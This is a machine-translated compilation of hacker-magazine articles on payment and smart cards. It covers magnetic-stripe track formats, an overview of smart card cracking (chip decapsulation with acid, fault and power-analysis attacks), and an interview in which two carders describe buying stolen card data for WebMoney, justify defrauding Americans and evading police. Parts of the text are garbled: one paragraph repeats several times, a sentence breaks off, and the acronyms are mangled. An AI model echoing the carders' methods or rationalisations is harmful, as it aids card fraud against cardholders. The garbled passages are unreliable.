7: Not for payment, except for pre-negotiated agreements.
8: Reserved for future use.
9: For verification.
The second digit defines the terms of use / authorization of the card (Authorization processing):
0: Transactions are carried out according to standard rules.
1: Reserved for future use.
2: The transaction is carried out by the emitter, must be online.
3: Reserved for future use.
4: The transaction is carried out by the emitter, must be online, except for pre-agreed agreements.
5: Reserved for future use.
6: Reserved for future use.
7: Reserved for future use.
8: Reserved for future use.
9: Reserved for future use.
The third digit defines the services and conditions of the PIN
0 requirement : No restrictions, PIN is required.
1: Unlimited.
2: Goods and services (not cash).
3: ATM only needs a PIN.
4: Only money.
5: Goods and services (not cash) and PIN required.
6: Unlimited, PIN on demand.
7: Goods and services (not cash) and PIN on demand.
8: Reserved for future use.
9: Reserved for future use.
Then comes the PVV (PIN Verification Value) hash, 5 characters, followed by the characters reserved for use by the emitter. And at the end of everything there is a trailing character -?
Second track example (made up):; 4598530106131217 = 06081211834918387276?
Overview of smart card cracking methods
The smart card industry is experiencing a powerful boom. In 2002, nearly 2 billion smart cards with an embedded microchip were sold worldwide, and these numbers are expected to grow exponentially in the coming years.
The reasons for this are simple - the scope of use of smart cards is constantly expanding: from a telephone card to a PC user authentication token, from an "electronic wallet" for storing digital cash to a digital ID passport. The massive introduction of smart cards into everyday life is accompanied by indispensable assurances from industry officials that chip cards are the most secure technology available today, which is difficult (read - almost impossible) to open. But you and I know that this is not at all the case.
Whether someone likes it or not, opening smart cards is a very old and widespread phenomenon. According to experts, since about 1994, almost all types of smart card chips used in European, and then in American and Asian Pay TV systems have been successfully cracked by crackers using reverse engineering methods. And the mined secrets of the cards (a diagram and key material) were then sold on the black market in the form of illegal clone cards for watching closed TV channels for free.
Less covered in the press is another area - counterfeiting of telephone smart cards or electronic wallets. However, it is known that in this area, too, not everything is in order with the resistance to hacking. The industry has to update its smart card processor protection technologies on a regular basis, and crackers are responding with more sophisticated cracking techniques, and so on ad infinitum.
Variety of technologies
The classification of methods for cracking smart cards may differ slightly from one author, however, the following categories of attacks are most often distinguished, which are usually used in different combinations with each other.
- Microprobe technologies - using a microscope and a microprobe needle, it allows access directly to the surface of the chip, where the attacker registers the passage of information (bit by bit), manipulates processes and interferes with the operation of an integrated circuit.
- Software attacks - use the usual communication interface of the smart card processor and exploit security vulnerabilities identified in protocols, cryptographic algorithms and other features of a specific implementation of the scheme. Note that the more mature the protection technology is, the more often this method has to be combined with other attack methods.
- Analysis of side channels of information leakage - an attacker with a high time frequency removes the analog characteristics of fluctuations in the power supply and interface connections, as well as any other electromagnetic radiation generated by the elements of the processor circuit (transistors, triggers, etc.) in the course of normal operation.
- Fault induction technologies, on the contrary, create abnormal operating conditions in order to cause errors in the operation of the processor and thus open additional channels of access to protected information.
Destructive attacks
A typical smart card chip module has a thin plastic base on the order of one square centimeter with contact areas on both sides. One side of the module is visible on the smart card itself and contacts the reader. The silicon matrix is glued to the other side of the base (connection with thin gold or aluminum wires). The side of the chip where the chip is located is coated with epoxy, and such a chip module is glued into the card.
It is easy to remove the chip from the card. Previously, craftsmen took out with a sharp knife or lancet, cutting off the plastic from the back of the card until the epoxy appears. Later, they began to quickly take out the chip, simply heating the plastic to a soft state. Then the epoxy layer is removed by applying a few drops of concentrated nitric acid (more than 98%). Before the acid has time to dissolve too much of the epoxy layer and harden, the acid and resin are washed off with acetone. The procedure is repeated 5 to 10 times until the silicon matrix is completely visible. It is necessary to make such abuse of the chip carefully so as not to damage the connecting wiring, then it will remain operational.
If the processor is brand new, you will need to create a schematic map. Nowadays, an optical microscope and a digital camera are usually used for this, with the help of which they make a large (several meters in size) mosaic from high-resolution images of the chip surface.
Most chips have a protective surface layer (passivation) of silicon oxide or nitrate, which protects them from equipment radiation and ion diffusion. Nitric acid does not act on it, therefore, specialists use a complex method of dry etching to remove it. But this is not the only way to access the surface.
Another technique, especially when the circuit is generally known, is to use microprobe needles, which, using ultrasonic vibration, remove the protective layer just below the point of contact. In addition, laser cutters-microscopes used in cell biology laboratories are used for local removal of the protective layer.
The dissection technique described, which I hope you're not swollen to read, has been successfully used by amateur crackers. Precisely by amateurs, since the technologies described below are available only to well-equipped laboratories that study semiconductors. There are hundreds of such laboratories in the world (for example, in universities and industrial research centers). The most advanced crackers will rent this technique.
Research into the technique of cutting a chip leads to a more general (and relatively less studied) problem - attacks that involve actively modifying the chip under investigation, rather than simply examining it passively. For example, there is every reason to believe that some of the successful pirate attacks on Pay TV have been conducted using Focused Ion Beam workstations (FIBs). Such a device can cut tracks in the metallized layer of the chip and form new tracks or insulating layers. In addition, the FIB can implant ions to change the thickness of the silicon layer and even build vias to conductive structures in the underlying layers of the chip. Such devices cost several million dollars, but, as practice shows,
With these tools, attacks on smart cards become simpler and more powerful. A typical attack involves disconnecting almost all CPU processes from the bus except for the EEPROM and the component of the CPU that generates read access. For example, a software counter can be left connected so that memory areas are read in order as clock pulses are applied.
Once this is done, the attacker only needs one microprobe needle to read the entire contents of the EEPROM. As a result, the analysis process becomes easier than with passive exploration, when usually only the execution trace is analyzed. It also avoids the purely mechanical difficulties of simultaneously handling multiple microprobe needles on bus lines that are only a few microns wide.
Fault induction technologies (glitch attacks)
In principle, computer makers have long known that engineering-protected devices such as smart cards, which are usually small and compact, can be subjected to some level of radiation or heat exposure, improper supply voltage, or non-standard clock frequencies to cause computational error. It is also known that when a computing failure occurs, a computing device can provide information useful for recovering sensitive data. However, for a long time, few people suspected how serious this threat really is.
At the end of September 1996, a team of authors from Bellcore (a research center of the American company Bell) reported that a serious potential general weakness had been found in secure cryptographic devices, in particular, in smart cards for electronic payments (D. Boneh, RA DeMillo, RJ Lipton: "On the Importance of Checking Cryptographic Protocols for Faults",
www.demillo.com/PDF/smart.pdf). The authors called their attack method Cryptanalysis in the Presence of Hardware Faults. Its essence is that, by artificially causing an error in the operation of an electronic circuit using ionization or microwave irradiation, and then comparing the faulty values at the output of the device with knowingly correct values, it is theoretically possible to recover cryptographic information stored in a smart card. Research by scientists has shown that all devices that use public-key crypto algorithms to encrypt information and authenticate a user are exposed to the new threat. These can be smart cards used for storing
data (for example, electronic money), SIM cards for cellular telephony, cards that generate electronic signatures or provide user authentication for remote access to corporate networks. True, the attack developed at Bellcore was applicable for breaking keys exclusively in public key crypto schemes - RSA, Rabin's digital signature algorithm, Fiat-Shamir identification scheme, etc. using cryptographic algorithms with public keys to encrypt information and authenticate the user. These can be smart cards used for storing data (for example, electronic money), SIM cards for cellular telephony, cards that generate electronic signatures or provide user authentication for remote access to corporate networks. True, the attack developed at Bellcore was applicable for breaking keys exclusively in public key crypto schemes - RSA, Rabin's digital signature algorithm, Fiat-Shamir identification scheme, etc. using cryptographic algorithms with public keys to encrypt information and authenticate the user. These can be smart
cards used for storing data (for example, electronic money), SIM cards for cellular telephony, cards that generate electronic signatures or provide user authentication for remote access to corporate networks. True, the attack developed at Bellcore was applicable for breaking keys exclusively in public key crypto schemes - RSA, Rabin's digital signature algorithm, Fiat-Shamir identification scheme, etc. generating electronic signatures or providing user authentication for remote access to corporate networks. True, the attack developed at Bellcore was applicable for breaking keys exclusively in public key crypto schemes - RSA, Rabin's digital signature algorithm, Fiat-Shamir identification scheme, etc. generating electronic signatures or providing user authentication for remote access to corporate networks. True, the attack developed at Bellcore was applicable for breaking keys exclusively in public key crypto schemes - RSA, Rabin's digital signature algorithm, Fiat-Shamir identification scheme, etc.
The main result of the publication of Bellcore's work was that the well-known problem in a narrow circle attracted the attention of a much larger number of researchers. And less than a month after the publication of Bone-DeMillo's article (in October 1996), it became known about the development of a similar theoretical attack against symmetric cryptoalgorithms, that is, data closing ciphers with a shared secret key. The new method was developed by the famous tandem of Israeli cryptographers Eli Biham and Adi Shamir, called Differential Distortion Analysis (AIM for short).
Using the most common DES block cipher as an example, these authors demonstrated that using the same Bellcore hardware failure model, it is possible to "pull" the full DES key from a secure smart card by parsing less than 200 ciphertext blocks (DES block is 8 bytes). Moreover, a number of works by Biham-Shamir subsequently appeared with a description of methods for extracting a key from a smart card in conditions when practically nothing is known about the crypto scheme implemented inside. Pull the final version of the article describing this work from
www.cs.technion.ac.il/users/wwwb/cgi-bin/tr-get.cgi/1997/CS/CS0910.revised.ps.
Side channel analysis of information leakage
In the summer of 1998, news came about another method of opening smart cards, more than successfully implemented in practice. Cryptography Research, a very small, 4-person crypto consulting firm based in San Francisco, has developed extremely powerful analytical tools for extracting secret keys from cryptographic devices. It's funny, but according to the head of the firm Paul Kocher, the researchers "have not been able to find a single card that could not be revealed."
At the same time, Kocher is a biologist by education, and has been engaged in hacking since childhood as a hobby. It is possible that it was biological education that helped him develop his own style of analyzing "black boxes", treating them as living organisms and carefully examining all the available signs of their "vital activity".
Kocher and his colleagues, in fact, reinvented the secret methods of the secret services and learned how to break the protection of smart cards using the apparatus of mathematical statistics and algebraic error correction methods to analyze fluctuations (small fluctuations) in the consumption of a power supply chip. This was done for about a year and a half from 1996 to 1998, when specialists from Cryptography Research figured out how to increase the strength of portable cryptographic tokens, including smart cards. Without publicizing their research, they introduced the smart card community to the firm's attack patterns called Simple Power Analysis (PAP) and Differential Power Analysis (DAP). If you want to dig deeper in this direction, take a look at the link
www.cryptography.
It is quite obvious that such analysis methods deserve the most serious attention, since attacks of this kind can be carried out quickly and using off-the-shelf equipment costing from several hundred to several thousand dollars. The basic concepts of the new attack technique were formulated in the earlier and rather well-known work of Paul Kocher "Cryptoanalysis Based on a Timed Attack" (in 1995 -
www.cryptography.com/resources/whitepapers/TimingAttacks.pdf). In this work, it was demonstrated that it is possible to crack crypto devices simply by accurately measuring the time intervals that are required to process data.
As for PAP attacks, here the analyst directly observes the dynamics of energy consumption by the system. The amount of power consumed varies depending on the instructions being executed by the microprocessor, and a sensitive ammeter can be used to accurately track fluctuations in power consumption. This is how large blocks of instructions are identified (DES cycles, RSA operations, etc.), since these operations performed by the processor have fragments that are significantly different in appearance. With greater amplification, individual instructions can also be distinguished. While PAP attacks mainly rely on visual analysis to isolate significant power fluctuations, the much more efficient PAP method relies on statistical analysis and error correction technologies to extract information that correlates with secret keys.
New methods of attacks and reading information from memory
In June 2002, another method of cracking smart cards and protected microcontrollers was announced, called the "optical fault induction attack" -
www.cl.cam.ac.uk/~sps32/ches02-optofault. pdf). This class of attacks was discovered and investigated at the University of Cambridge by graduate student Sergei Skorobogatov (by the way, a 1997 MEPhI graduate) and its leader, Ross Anderson.
The essence of the method is that focused illumination of a specific transistor in an electronic circuit stimulates conduction in it, which causes a short-term failure. These types of attacks turn out to be quite cheap and practical; they do not require complex and expensive laser equipment. For example, the Cambridge researchers themselves used a flash unit purchased from a second-hand store for £ 20 as a powerful light source.
To illustrate the power of the new attack, a technique was developed that allows using a flash and a microscope to set any bit in the SRAM memory of the microcontroller to the desired value (0 or 1). The optical probing method can induce failures in the operation of cryptographic algorithms or protocols, as well as distort the flow of processor control commands. It is clear that the listed capabilities significantly expand the already known "faulty" methods of opening crypto schemes and extracting secret information from smart cards.
The industry, as usual, is trying in every possible way to downplay the importance of the new attack method, since it belongs to the class of destructive attacks, accompanied by damage to the protective layer in the smart card chip. However, according to Anderson, attackers can get by with minimal physical interference: silicon is transparent in the infrared range, so the attack can be carried out directly through the silicon substrate on the back of the chip, removing only the plastic. Using X-rays, the map can be left completely intact.
Countermeasures
The arsenal of means for protecting smart cards today is very diverse. Disruptive opening methods can be resisted by capacitive sensors or optical sensors under an opaque shell (something that crackers have long learned to bypass). Or "special glue" - a coating for chips that is not only opaque and conductive, but also reliably resists attempts to destroy it, usually destroying the silicon layer underneath. Such coatings belong to the US federal standard FIPS 140-1 and are widely used in the American military industry, but they cannot be called ubiquitous in everyday life.
A number of inexpensive and effective countermeasures for "Differential Power Analysis (PDA)" and "Differential Distortion Analysis (DAD)" are known from Cryptography Research. In particular, special hardware and software methods have been created that provide a significantly lower level of compromising information leaks, the introduction of noise into measurements, decorrelation (separation of interdependencies) of internal variables and secret parameters, as well as time decorrelation of cryptographic operations.
A significant number of new security methods have been proposed by the Computer Laboratories of Louvain and Cambridge (
www.dice.ucl.ac.be/crypto,
www.cl.cam.ac.uk/Research/Security/tamper/). The essence of one of them, for example, is to replace traditional electronic circuits with a self-synchronizing "dual-rail" (dual-rail) circuit, where logic 1s and 0s are not coded, as usual, by high (H) and low (L) voltage pulses in a single conductor. a are represented by a pair of pulses (HL or LH) in two conductors. In this case, the appearance of an "abnormal" pair of pulses of the form (HH) immediately becomes an alarm signal, leading, as a rule, to reboot the processor.
It's one thing to read about all of these methods on paper, and quite another to see how it actually works. According to experts, the opening picture is really impressive. And it stimulates, of course, to search for new countermeasures with even greater zeal.
Smart card device
A typical smart card is an 8-bit microprocessor, read only memory (ROM), random access memory (RAM), electrically programmable memory (EEPROM or FLASH, where, in particular, cryptographic key material is stored), serial input and output. All this economy is housed in one chip, enclosed in a case - usually a plastic card the size of a credit card.
In terms of their potential, smart cards have a number of important advantages over other technologies. With their own processor and memory, they can participate in cryptographic communication protocols, and, unlike magnetic stripe cards, stored data here can be protected from unauthorized access. The only trouble is that the real durability of this protection is often overestimated.
The following is a brief overview of the most important technologies used in opening smart cards. This information is important for anyone who wants to get a real idea of how the opening of protected devices takes place, and how much it costs. Naturally, a careful study of the applied attack methods allows to develop adequate countermeasures and create much more effective protection of smart cards.
All microprobe technologies are inherently destructive attacks. This means that their implementation requires many hours, sometimes weeks of work in a specialized laboratory, and the chip itself is destroyed. The other three categories are non-destructive attacks. In other words, after an attacker has prepared such an attack against a specific type of processor and an already known version of software, he can easily reproduce it against any other card of the same type. In this case, the attacked card is not physically damaged, and the equipment used for the attack can usually be disguised as a regular reader (smart card reader).
Obviously, non-destructive attacks are especially dangerous because they leave no traces behind. But it is also clear that the very nature of such attacks implies detailed knowledge of the processor and software of a particular card. On the other hand, destructive microprobe attacks require very little initial knowledge of a particular design.
Thus, an attack on a new smart card usually starts with destructive reverse engineering, the results of which help create cheaper and faster non-destructive attacks. In particular, it is this sequence of events that has been repeatedly noted when opening conditional access cards in Pay TV systems.
This type of attack includes those that are accompanied by the opening of the device's case. The public presentation of such methods used in the cracking underground was first made in 1996 by University of Cambridge researchers Ross Anderson and Marcus Kuhn during the second USENIX e-commerce workshop (Ross Anderson, Marcus Kuhn "Tamper Resistance. Warning,"
www.cl .cam.ac.uk / ~ mgk25 / tamper.html). These technologies are described in more detail in a 1999 joint paper by Kuhn and Oliver Kemmerling, "Principles for Designing Secure Smart Card Processors" (
www.cl.cam.ac.uk/~mgk25/sc99-tamper.pdf), as well as a subsequent doctoral dissertation Kuhn, which, however, has not been published on the Internet.
In the early 1990s, the Cavendish Laboratory, Cambridge, developed a technology for reversing the circuitry of complex silicon chips, allowing the layers of a microcircuit to be carefully peeled off one by one. One of the innovations applied here is the technique of showing impurity N and P layers based on the Schottky effect: a thin film of gold or palladium is superimposed on a chip, forming a diode that can be seen in an electron beam. Images of successive layers of the chip are entered into a computer, special software cleans the initially fuzzy images, gives them a clear representation and recognizes the standard elements of the chip. This system has been tested on the Intel 80386 processor and a variety of other devices. Rebuilding the 80386 took two weeks to complete, with about six chip samples usually required to properly rebuild the 80386.
In an environment where the design and principles of operation of the chip are already known, there is a very powerful technology developed by IBM to study the chip in operation even without removing the protective layer. A lithium niobate crystal is placed above the device to measure the performance of the device. The refractive index of this substance changes with a change in the electric field, and the potential of the silicon underneath can be read using an ultraviolet laser beam passing through the crystal at a sliding angle. The capabilities of this technology are such that a 5 V signal can be read at up to 25 MHz. Essentially, this is the standard path for well-equipped labs to recover crypto keys in chips of known design.
Most often, criticism of the differential analysis of distortions (especially from the manufacturers of smart cards) boiled down to the fact that this entire technique is purely theoretical. After all, no one has demonstrated in practice that faulty errors can be caused precisely in the crypto scheme, and specifically in the key expansion algorithm.
But already in the spring of 1997, a description appeared of not a theoretical, but a very practical attack, called the "improved method of AIM". The authors of the attack (Cambridge professor Ross Anderson and his graduate student from Germany Markus Kuhn) demonstrated that they can extract a key from a smart card using less than 10 ciphertext blocks. The new method was based on the model of forced distortions or "glitch attacks" (from the English glitch - splash, outburst), actually practiced by crackers when opening pay TV smart cards.
Glitch attacks are understood as manipulations with the clock frequency or supply voltage of smart cards, which makes it possible to issue dumps with key material to the output port of the device. The effectiveness of glitch attacks has been demonstrated by the Cambridge authors both on symmetric crypto schemes and on attacking public key algorithms. Links to relevant dybai articles on Ross Anderson's website -
www.cl.cam.ac.uk/users/rja14/#Reliability.
In traditional analysis of crypto devices and secure protocols, it is customary to assume that the input and output messages are available to the attacker, but he does not know any information about the keys. However, any electronic device consists of specific elements that release information about their work to the environment. So, in fact, all sorts of side information issued by the crypto device can be available to the attacker: electromagnetic radiation, error signals or time intervals between executed instructions, fluctuations in power consumption and other data. In general, all this is very well known to the military and special services, where special methods of working with side channels of information leakage have been developed, but this topic (codenamed Tempest) is strictly classified and there are very few open publications about it.
The same experts from Cambridge, together with scientists from the computer laboratory of the University of Louvain (Belgium), have recently developed several more new methods for reading information from secure smart card chips (David Samyde, Sergei Skorobogatov, Ross Anderson, Jean-Jacques Quisquater: On a New Way to Read Data from Memory -
www.ftp.cl.cam.ac.uk/ftp/users/rja14/SISW02.pdf). These methods have in common that they induce measurable changes in the analog characteristics of memory cells.
For example, by scanning cells with a focused laser or inducing eddy currents in them using an inductive coil on the microprobe needle, it is possible to increase the electromagnetic leakage that produces the bit value recorded there, but at the same time this value itself remains intact in the cell. Strong cooling of the chip at the right moment in time can "freeze" the contents of the register of interest and read from it (key) information, usually stored or transmitted in encrypted form. This technology is applicable to a wide variety of memory types from RAM to FLASH and is actually demonstrated by reading DES keys from RAM cells without any physical contact with the chip.
This work was carried out by scientists at the request of the European Union project G3Card and aims to create smart cards of the next generation, capable of maximally resisting modern attacks, up to "semi-destructive". The creation of absolute protection, of course, is not realistic for devices used in reality, one of the main advantages of which is low cost.
Of course, it is not just universities or small firms such as Paul Kocher's Cryptography Research or Oliver Kemmerling's Advanced Digital Security Research that develop measures to protect smart cards from tampering. Much work is being done directly in the smart card industry, where, however, they prefer not to go into details on this topic. But sometimes some information leaks out.
So, last year at the cryptographic exhibition and conference RSA-2002, an interesting exposition was organized by the Datacard Group (
www.datacard.com), which specializes in the development of smart cards. At their exhibition stand, the company's employees deployed a "field version" of a small electronic laboratory. Literally before the eyes of the amazed public, the opening of smart cards using the above methods of DAP and AIM was demonstrated. Very little equipment was required for this work - an oscilloscope, a computer and a few "special boxes".
For viewers, the process of opening a smart card looked something like this: "Now you see a sequence of vertical bursts on the oscilloscope screen. These are cycles of the DES algorithm that encrypts information in the card chip. Let's increase the resolution of the picture. Inside the loop you see peaks of a characteristic shape - these are S- boxes that transform the key we need. Let's run the autopsy program, which looks for bits of secret information by the features of these signals, and in a minute or two we get the key at the output of the program".
Triple DES was opened in the same way, but about 3 times longer. It took Datacard analysts the same few minutes to find the pair of large primes that make up the RSA key. For this, of course, horribly time-consuming factorization methods were not used, but "just" carefully analyzed the reactions of the smart card chip to small variations in voltage and frequency when power is applied.
Virtually all types of smart card chips in European and then American and Asian Pay TV systems have been successfully cracked by crackers using reverse engineering techniques.
Communication with the carder
Wandering one night across the Internet, I stumbled upon a site entirely devoted to carding -
www.cardingworld.com. Plucking up the courage, I struck up a conversation with the owners of the resource. Meet David and Graf.
There is an opinion that all carders are closed, bestial and secretive creatures, which, not only to talk, are difficult to simply catch alive. In fact, they are the most ordinary people, and they are forced to be secretive by a hobby that falls under certain articles of the Criminal Code. But not everyone is engaged in carding in practice (they know only in theory), or they have outgrown their hobby and retired long ago. Someone remembers with nostalgia, someone creates their own resources, and someone else makes money on these resources, having founded a bridgehead for their fellows that helps to quickly exchange the necessary information.
XS: First, tell us a little about yourself. Name, age, where do you live?
David: My name is Serega, 19 years old, I live in Minsk.
Graf: And they call me Kostya, I'm 21 years old, I live in the distant Kemerovo region, in the glorious state of Russia.
XS: How was your childhood? Didn't you fall out of bed?
David: Childhood was great, although it was not connected with computers.
Graf: Yes, it's okay, I'm not complaining, everything happens in life - both good and bad.
XS: In what year did the first computer appear? What were your hobbies?
David: The first computer with the weird name "VECTOR" appeared around 1990. At first, like most PC users, he played with different toys. Later he became interested in everything else.
XS: What about education? Where are you gnawing granite at the moment?
David: At the moment I am finishing my studies at a non-state technical school. The specialty is in some way connected with carding, although at the time of admission I was not yet fond of this direction.
Graf: I graduated from high school and college, now I'm at university, halfway to my diploma.
XS: What is carding? Your opinion?
Graf: Carding is a way to take possession of other people's money or the purchase of any product using stolen credit cards.
XS: When and why did you get involved in carding?
David: I started to get involved in carding a little over a year ago. Well, in principle, carding took me a lot, and it brings me a lot of money.
Graf: I have been doing carding for 2 years now, because I see this as a real way to make good money, plus a huge interest.
XS: How long did it take you to get up one morning and proudly say, "I am a carder"?
David: To realize that I really am a carder, it took me about a year of hard work in this direction.
Graf: Six months.
XS: How did you advance? What did you read at night?
David: It all started with collecting useful information from the Web and reading similar articles, which helped me figure it out.
Graf: A separate story happened to me. I was walking calmly down the street and suddenly I noticed a credit card with a chip. I was very interested if there was money there, and also how it could be withdrawn. Without thinking twice, I turned to the Internet for help. At first I was looking for how to crack the chip, then I gradually learned what credits are. Well, and there, of course, how they can be cashed out. And off we go.
XS: What's going on on stage now? Who do you consider your idols in the world of carding?
Graf: The scene lives on, carders are like a plague, for which a vaccine has not yet been invented. We have been, are and will be as long as the Network exists. Each carder is unique in its own way, so I will not name anyone separately.
David: There are several authorities for me in the world of carding, but I would not like to talk about them "live".
XS: How did you come up with the idea to create a website?
David: The idea to create the site came to Graf, and I took responsibility for its development.
Graf: I met David, we found a common language, began to communicate often, then I got the idea to create my own project, he supported me in this endeavor, after which the site itself appeared. Everything is as simple as life itself.
XS: What is the function of the forum on the site?
Graf: Helps our members in this or that field of carding, on our forum you can always post an announcement, find something you need for yourself, consult and get a bunch of useful information.
David: On my own behalf, I would also like to add that the forum helps newbies and advanced carders to communicate, exchange experiences, get answers to various questions, etc.
XS: In what ways do you personally obtain credits? Which of the ways do you think is the best and safest?
David: How? I personally am not a hacker to break right and left online stores, so I buy cardboard from friends.
Graf: I borrow credit cards from friends. I think this is the safest way, as credits are obtained mainly by hacking various porn sites, online shops and other organizations that accept credit cards.
XS: How is credit card trading done?
David: Creeds (cardboard) can be bought in bulk from famous people, which will be much cheaper than retail. Cardboard is sold mainly for WebMoney or E-Gold. The scheme is as follows: you send a certain amount to the seller's wallet, and in exchange they send you cardboard by ICQ or by e-mail. IMHO, nothing could be easier!
XS: What methods do online shops use to combat "terrible" carders?
Graf: There are a lot of methods of struggle, but they have long been known to us and well developed. At first there were simple credit cards, now they have introduced the security code cvv2 and cvc. Although it is still possible to find sites using simple credits. There are times when voice confirmation is required. It is often required to send scans of a passport, license or credit card. But we do not sleep and constantly come up with methods of counteracting various defenses.
XS: Does your conscience bother you?
David: Why should my conscience torment me? I don't rob my own people, but mostly greedy bourgeois or rich tycoons. I don’t take the last money from the beggar.
Graf: No, it doesn't. For what? For taking some money from a snickering nation like the Amer? A country where 60% of the population is obese, who always climb where they are not asked, dictate something, indicate, a plug in every ass? One old carder said a smart phrase: "We will make the States a little poorer, and Russia and the CIS a little richer."
XS: Your position is clear. Do you know such a department "K"?
David: Of course. We know both the "R" department and the "K" department. So we use any means to protect ourselves from them. Almost all carders use anonymous proxies, VPN and other chips.
Graf: I know. Of course, I would not want to fall into their clutches, but, as they say, to be afraid of wolves - do not go to the forest.
XS: Which axis do you think is the safest on your PC?
David: Windows 2000 Pro is currently installed. I don't use Linux because I'm used to windows.
Graf: Before XP I used 98, but now I am seriously addicted to XP. And security in microsoft is a relative concept.
XS: Does the carder have any special software on the wheelbarrow or like everyone else?
David: Miranda, WinRar, FlashGet, RusmIRC, SocksCap, CuteFTP Pro, Internet Explorer, Webmoney, WinAmp and other software have taken root on my pussy. And besides that, I use a lot of self-written software, it makes no sense to list - all are noname.
Graf: I won't be original: IE, OutLook, ICQ, WinAmp, OutPost.
XS: What are you programming with?
David: PHP, ASP and C ++.
XS: What do you do in your free time from carding?
David: In my free time I try to stay away from the computer. I rest like all ordinary people.
Graf: I study, I hang out in clubs, I relax in every possible way and in different ways.
XS: What are carders listening to?
David: Mostly Circle. I love Russian chanson, but I can also fall for cool DJ mixes for a while.
Graf: I don't have any special idols, but I like to listen to Linda, Enigma, Prodigy, In-Grid, Glucose and VIAGRA.
XS: Read what? Favorite author?
David: I don't have enough time for books, I study hard.
Graf: Now I don't read anything, only the press. Favorite author - Dostoevsky.
XS: Watching TV?
David: Naturally I watch, mostly sports. Sometimes news.
Graf: Of course. I love good movies and the latest news.
XS: And finally, a few words to our readers who want to embark on the path of carding.
David: Think about it 101 times before you decide to take the "high road".
Plastic cards for all occasions
For several decades, plastic cards have been widely used in everyday life. Having appeared long before the proliferation of personal computers and cell phones, they replace paper bills, passes and IDs.
But the obvious advantages hide less obvious disadvantages. If, in order to deprive you of cash, a fraudster needs to pull your wallet out of your bag or pocket, then for theft with the help of plastic cards it can be in the next room, or maybe on another continent.
The problem of identity theft (literally - identity theft) has become one of the most discussed topics in recent years. Although this term is understood as both forgery of checks and theft of passwords, and with the proliferation of alternative authentication mechanisms (in particular, biometrics), more and more opportunities for the abuse of personal information have to be taken into account, it is plastic cards that are in the center of attention.
Students, businessmen and housewives have them - debit and credit, for travel by public transport, payment for telephone calls, Internet access, etc. It got to the point that plastic calling cards became collectible - at any online auction you can find a section dedicated to this "philately of the XXI century." Even polyclinics now issue plastic cards instead of a paper insurance policy!
All this "plastic" can be divided into three main categories according to the method of information storage: cards with a magnetic stripe, scratch cards and smart cards. Plastic business cards and other souvenir products are distinguished into a separate group, the types of offenses with their use are allegedly unknown. Although on the subway, I walked past ferocious old women several times, showing them a plastic calendar, and last year's.
Magnetic stripe cards
The first thing that comes to mind when you hear the term "plastic card" is the classic magnetic stripe cards. They appeared in the 50s of the last century. The Diners Club pioneered the new technology, followed by American Express. During this time, the cards have spread all over the world, and they also account for the largest percentage of illegal actions, or, simply put, cases of fraud and theft.
According to the ISO-7810 standard, a plastic card is a rectangular plate 85.6x54 mm in size and 0.76 mm thick. To protect this tiny piece of plastic, the latest technologies are used in a variety of fields: printing, chemical industry, software development, etc.
Usually the card carries the following information:
On the front side:
- unique 16-digit number;
- validity period (from and to);
- Owner's name.
On the back side:
- magnetic stripe;
- owner's signature.
In addition, many images can be printed on the card: a photograph of the owner, reference information for bank customers, etc.
Letters and numbers on the front side can be embossed with a special embosser, or they can simply be printed, for example, as on Visa Electron cards.
The main data storage on the card is the magnetic stripe. Its properties are similar to the film used in audio cassettes. Information can be recorded on three tracks, differing in format:
- the former has a recording density of 210 bits per inch (BPI) and can contain 79 7-bit (6 bits + parity) alphanumeric characters (read-only);
- the second - 75 BPI, contains 40 5-bit (4 bits + parity) digits;
- the third - 210 BPI, contains 107 5-bit (4 bits + parity) digits.
On bank cards, the following are recorded on the tracks: account number, currency code, country code of issue, owner's name, validity period (in principle, the same information that is printed on the card itself, but in digital form). In addition, any company can use its own data format. For example, for use as an internal pass there, instead of the account number, the authorization level of the owner, etc. can be indicated.
Each time the system initiates an authentication process to conduct monetary transactions using bank cards - the correctness of the information recorded on the card is checked. Authentication is of the following types:
- voice authorization - the simplest case, carried out using a tone-dialing telephone;
- electronic terminal - reading information from a magnetic strip, for example, in ATMs or POS terminals;
- virtual terminal - data verification when paying via the Internet.
In any case, on one side is the cardholder, and on the other is a specialized organization (acquirer), which establishes a connection with the bank that issued the card to verify the data:
- Card number;
- limit (for a credit card);
- card expiry date;
- availability of money in the account.
If all the necessary conditions are met, and the requested amount does not exceed the account balance, the same organization provides guarantees for the transfer of money to another participant in the transaction.
Data transfer between the terminal and the testing organization takes place via telephone networks or via Internet channels. Encryption is used to protect the transmitted data. For example, an ATM encrypts the entered PIN-code and sends it for verification with what is stored in the database of the bank that issued the card. For encryption, a one-way cryptographic method is used. It is easy to calculate their value in one direction using the bank key and the typed PIN-code, and the reverse transformation (inversion) is very inefficient in practice, even if the bank key has become known. This protection was introduced to protect the cardholder from the actions of a bad uncle who gained access to bank databases.
In addition to technical means, organizational and administrative methods of protection are of great importance. They include a whole range of measures at various levels: from special locks on ATM booths and emergency call centers, where you should contact in case of loss or theft of a card, to government control over the sale of equipment for the production of the cards themselves.
It would seem that in the process of paying with a plastic card, everything is so stipulated, and each operation undergoes so many different checks that it would probably be easier to infiltrate foreign intelligence than to steal money from an account. And although the statistics of detecting spies are hidden from us, judging by the available information on cases of fraud, everything turns out to be far from as rosy as we would like. With successful attacks, hackers prey on information about millions of bank cards. And such cases occur often enough to make everyone who keeps their money "on the card" anxious.
But the problems people face when using plastic cards with magnetic tape are not limited to illegal actions. Like any other technology half a century ago, they have a number of drawbacks. For example, a lot of inconvenience is caused by the fact that any magnet can simply erase all stored information, and even simple scratches can affect its integrity. And this is not the worst thing in comparison with other "birth trauma".
Smart cards
Smart card technology has been around for a long time to correct these shortcomings. They were first used by the French in 1984. But until now they have not received widespread distribution. Although there were plans according to which all payment systems were going to switch to using smart cards by 2004, banks continue to issue good old "plastic".
Outside, both types of cards (magnetic and smart cards) look almost the same, but inside. I'll start with the fact that ordinary cards don't have any "inside" at all, while smart cards have a microchip hidden under the gold-plated contacts. It can contain up to a kilobyte of RAM, 24KB of ROM, and 16KB of flash ROM. It also has an 8-bit microprocessor operating at a frequency of about 5 MHz. And all this in a package thinner than a millimeter! It is clear that with such a wealth, the magnetic stripe disappears as unnecessary.
The computational capabilities of the processor allow you to move from basic authentication to full-fledged cryptography. And although the procedure looks familiar to the user who withdraws money (entered the PIN-code and you're done), a complex mechanism of encrypted data exchange works inside the system.
In order to ensure maximum protection of these algorithms, a "secret" is laid at each stage of the life cycle of smart cards. Thus, even if attackers penetrate directly into the technological process, the cards themselves will not be compromised.
